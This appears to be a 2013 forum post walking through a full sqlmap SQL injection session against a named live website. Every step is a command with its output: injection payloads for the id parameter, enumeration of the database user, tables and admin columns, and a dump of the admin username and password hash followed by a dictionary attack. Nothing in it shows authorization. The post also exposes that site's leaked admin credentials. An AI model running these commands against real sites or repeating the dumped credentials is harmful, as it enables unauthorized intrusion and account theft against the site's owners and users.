sqlmap example: injecting a MySQL back end

OP | Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14


D:\Python27\sqlmap>